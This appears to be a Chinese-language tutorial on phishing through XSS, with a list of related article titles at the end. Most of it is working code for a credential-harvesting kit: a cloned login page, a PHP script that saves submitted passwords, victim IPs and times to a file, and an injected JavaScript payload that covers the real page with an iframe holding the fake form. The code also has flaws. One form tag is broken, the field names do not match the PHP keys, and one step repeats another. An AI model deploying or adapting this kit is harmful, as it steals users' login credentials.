XSS漏洞釣魚
首先先準備一個登陸環境
login.php 登入頁面檔案
hack.html 釣魚用登入頁面,與正常登入頁面前端相同
hack.php 用於接受儲存釣魚頁面傳輸的資料
payload.js 用於覆蓋原有登入頁面
1、首先先做一個簡單的登陸頁面
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
</head>
<body>
登入介面</br>
<form action="127.0.0.1/login.php" method="post">
<input type="text" name="user" value="UserName">
<input type="text" name="pass" value="PassWord">
<input type="submit" name="name" value="login">
</form>
<script src="http://127.0.0.1/xsshack/payload.js"></script>
</body>
</html>
2、然後再做一個釣魚頁面,但是表單提交的地址變為我們可以控制的頁面,其餘的與登陸頁面相同
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>xxx使用者登入(釣魚頁面)</title>
</head>
<body>
http://127.0.0.1/hack.php" method="post">
xxxx登入頁面(釣魚頁面)<br>
<input type="text" name="user" value=""><br>
<input type="password" name="pass" value=""><br>
<input type="submit" name="Login" value="Login">
</form>
</body>
</html>
3、我們還需要一個接受儲存的密碼的指令碼,也就是上邊的hack.php檔案,程式碼如下:
<?php
$str=' ';
$str.='name: ' .$_POST['userName'] . ' | ';
$str.=' pwd:' .$_POST['password'] . ' | ';
$str.=' ip:' . $_SERVER["REMOTE_ADDR"] . ' | ';
$str.=' time:' . date("m-d-h:i");
file_put_contents('password.txt',$str.PHP_EOL, FILE_APPEND);
header("location:http://www.baidu.com");
?>
4、構造一段程式碼payload.js,實現覆蓋原有頁面並呼叫我們的釣魚頁面進行覆蓋,程式碼如下:
document.body.innerHTML='<div style="position:absolute;top:0px;left:0px;width:100%;height:100%">'+
'<iframe src=http://127.0.0.1/xsshack/hack.html width=100% height=100%>' +
'</iframe></div>';
5、然後我們可以利用頁面的XSS將利用程式碼插入到正常頁面,通過利用程式碼遠端呼叫我們的javascript檔案,覆蓋正常登入頁面,這裡只是演示,我們直接將利用程式碼加入到正常登陸頁面內
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
</head>
<body>
登入介面</br>
<form action="127.0.0.1/login.php" method="post">
<input type="text" name="user" value="UserName">
<input type="text" name="pass" value="PassWord">
<input type="submit" name="name" value="login">
</form>
<script src="http://127.0.0.1/xsshack/payload.js"></script>
</body>
</html>
6、此時當我們訪問登入頁面時,就會跳到我們的釣魚頁面。
通過原始碼可以不難看出,整個頁面已經被一個iframe框架覆蓋,並且資料提交地址已經改變
現在我們在輸入賬號密碼登入時資料已經提交到我們的伺服器並進行了儲存,然後URL跳到了我們指定的地址。
相關文章
- 釣魚釣魚去
- 釣魚篇-其他釣魚
- 釣魚篇-郵件釣魚
- 釣魚篇-網路釣魚
- 釣魚篇-其他型別釣魚型別
- 釣魚學習
- XSS漏洞
- 釣魚小技巧-XLM
- 釣魚網站與反釣魚技術剖析(圓桌會議)網站
- 網路釣魚攻擊
- 釣魚?這是反代理!
- 網路釣魚是什麼?網路釣魚攻擊的形式有哪些?
- 釣魚攻擊防不勝防,該如何預防網路釣魚攻擊?
- 釣魚攻擊時間軸,你知道常見的釣魚攻擊有哪些嗎
- 【JAVA-WEB常見漏洞-XSS漏洞】JavaWeb
- 使用powershell Client進行有效釣魚client
- 【NOIP2011模擬11.1】釣魚
- 郵件釣魚攻擊與溯源
- 新手段!網路犯罪分子利用谷歌Docs漏洞傳播網路釣魚連結谷歌
- 【釣魚攻擊】外貿白領:比“貿易戰”更頭疼的釣魚攻擊來襲!
- “!提醒:續購防毒”釣魚網站套路防毒網站
- Proofpoint:2024年網路釣魚報告
- 如何防範釣魚網站詐騙?網站
- 關於釣魚郵件,你知道多少?
- 透過.PAC進行網路釣魚
- php xss 反序列化漏洞PHP
- 記一次完成的釣魚實戰
- 網路釣魚 你知道如何識別嗎?
- 網路釣魚,你要怎麼防範
- 記一次釣魚靶機測試
- 雙因素認證繞過的釣魚工具
- GoogleTalk被黑客利用發動釣魚攻擊Go黑客
- 卡巴斯基:2020年網路釣魚報告
- PhishLabs:金融業的釣魚攻擊大幅增長,入侵現有網站成為釣魚活動首選策略網站
- 什麼是魚叉式網路釣魚?常見的方式有哪些?
- Web 安全漏洞之 XSS 攻擊Web
- 這樣的釣魚郵件,你會中招嗎?
- 安全公司揭露in-session網路釣魚新手法Session